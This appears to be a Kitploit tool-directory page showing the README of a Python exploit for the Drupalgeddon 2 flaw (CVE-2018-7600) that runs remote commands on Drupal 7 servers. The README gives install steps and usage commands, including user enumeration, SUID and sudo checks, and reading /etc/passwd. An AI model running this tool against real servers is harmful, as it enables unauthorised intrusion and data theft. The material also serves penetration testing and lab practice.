Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Drupalgeddon2-CVE-2018-7600 — 针对 CVE-2018-7600 (Drupalgeddon 2) 的 Python 漏洞利用,可在 Drupal 7 上实现远程代码执行,支持多种注入方法以及针对 Linux 和 Windows 的预定义命令。 | Kitploit
أدوات/GitHubGitHub/bixipro/drupalgeddon2-cve-2018-7600
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHubbixipro/drupalgeddon2-cve-2018-7600

Drupalgeddon2-CVE-2018-7600

针对 CVE-2018-7600 (Drupalgeddon 2) 的 Python 漏洞利用,可在 Drupal 7 上实现远程代码执行,支持多种注入方法以及针对 Linux 和 Windows 的预定义命令。

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔥 Drupalgeddon 2 Exploit — bixi.py

📖 الوصف

bixi.py هو أداة استغلال للثغرة CVE‑2018‑7600 (Drupalgeddon 2) التي تؤثر على Drupal 7. يتيح تنفيذ الأوامر عن بُعد (RCE) على خوادم Drupal الضعيفة عبر واجهة بديهية وأوامر محددة مسبقًا.


⚠️ إخلاء المسؤولية / تنبيه قانوني

هذا البرنامج مخصص فقط للأغراض التعليمية والبحثية في بيئات خاضعة للتحكم.

  • استخدمه فقط على الأنظمة التي تملكها أو لديك إذن كتابي لاختبارها
  • الاستخدام غير المصرح به غير قانوني وقد يؤدي إلى عقوبات جنائية
  • المؤلف غير مسؤول عن سوء استخدام هذه الأداة
  • التزم دائمًا بقوانين الأمن السيبراني المحلية والدولية

"القوة العظيمة تأتي مع مسؤولية عظيمة"


📋 المميزات

  • ✅ استغلال تلقائي لثغرة CVE‑2018‑7600
  • ✅ أوامر محددة مسبقًا لأنظمة Linux وWindows
  • ✅ طرق حقن متعددة (system, , , )
passthru
exec
shell_exec
  • ✅ واجهة بديهية مع نظام مساعدة
  • ✅ معالجة قوية للأخطاء والمهلات الزمنية
  • ✅ مخرجات منسقة وسهلة القراءة

  • 🚀 التثبيت السريع

    1. استنساخ المستودع

    root@kitploit:~
    git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
    cd Drupalgeddon2-CVE-2018-7600
    

    2. تثبيت التبعيات

    root@kitploit:~
    # Kali / Debian / Ubuntu
    sudo apt update
    sudo apt install python3 python3-pip -y
    pip3 install requests
    
    # Otras distribuciones
    pip3 install requests
    

    3. منح أذونات التنفيذ

    root@kitploit:~
    chmod +x bixi.py
    

    🎯 الاستخدام الأساسي

    عرض المساعدة الكاملة

    root@kitploit:~
    python3 bixi.py --help
    

    الصيغة العامة

    root@kitploit:~
    python3 bixi.py <URL> <COMANDO/PALABRA_CLAVE> [INJECTION_TYPE]
    

    أمثلة عملية

    root@kitploit:~
    # Verificar vulnerabilidad
    python3 bixi.py http://10.99.99.6/drupal/ test
    
    # Detectar sistema operativo
    python3 bixi.py http://10.99.99.6/drupal/ linux
    python3 bixi.py http://10.99.99.6/drupal/ windows
    
    # Enumerar usuarios
    python3 bixi.py http://10.99.99.6/drupal/ users_linux
    python3 bixi.py http://10.99.99.6/drupal/ net_user
    
    # Información del sistema
    python3 bixi.py http://10.99.99.6/drupal/ ifconfig
    python3 bixi.py http://10.99.99.6/drupal/ ipconfig
    
    # Comandos personalizados
    python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
    python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"
    

    📊 الكلمات المفتاحية المحددة مسبقًا

    🐧 Linux

    الأمرالوصف
    linuxمعلومات النظام
    users_linuxسرد المستخدمين
    idمعلومات المستخدم/المجموعات
    lsسرد الملفات
    ifconfigمعلومات الشبكة
    find_flagالبحث عن flags

    🪟 Windows

    الأمرالوصف
    windowsمعلومات النظام
    net_userسرد المستخدمين
    whoami_winمعلومات مفصلة
    ipconfigالشبكة
    netstat_winالاتصالات
    dirسرد الدليل

    🔧 اختبار الاختراق

    الأمرالوصف
    sudoالتحقق من صلاحيات sudo
    suidالبحث عن ثنائيات SUID
    net_localgroupالمجموعات المحلية
    drupal_configالبحث عن الإعدادات
    drupal_versionالحصول على إصدار Drupal

    🎨 طرق الحقن

    root@kitploit:~
    # system (default)
    python3 bixi.py http://target/ "whoami" system
    
    # passthru
    python3 bixi.py http://target/ "whoami" passthru
    
    # exec
    python3 bixi.py http://target/ "whoami" exec
    
    # shell_exec
    python3 bixi.py http://target/ "whoami" shell_exec
    

    🏗️ هيكل المشروع

    root@kitploit:~
    drupalgeddon2-exploit/
    │
    ├── bixi.py
    ├── README.md
    ├── requirements.txt
    ├── examples/
    │   ├── linux_commands.txt
    │   └── windows_commands.txt
    └── screenshots/
        ├── help_screen.png
        └── exploit_success.png
    

    🔧 الإعدادات المتقدمة

    البروكسي (اختياري)

    root@kitploit:~
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
    

    المهلة الزمنية

    تعديل القيمة الافتراضية (15 ثانية):

    root@kitploit:~
    timeout=15
    

    إضافة أوامر جديدة

    عدّل القاموس commands في get_command_for_keyword()


    🐛 استكشاف الأخطاء وإصلاحها

    خطأ: No module named 'requests'

    root@kitploit:~
    pip3 install requests
    

    خطأ: Connection refused

    root@kitploit:~
    # Verificar conectividad
    ping TARGET_IP
    
    # Verificar ruta Drupal
    curl http://TARGET_IP/drupal/
    
    تنزيل الأداة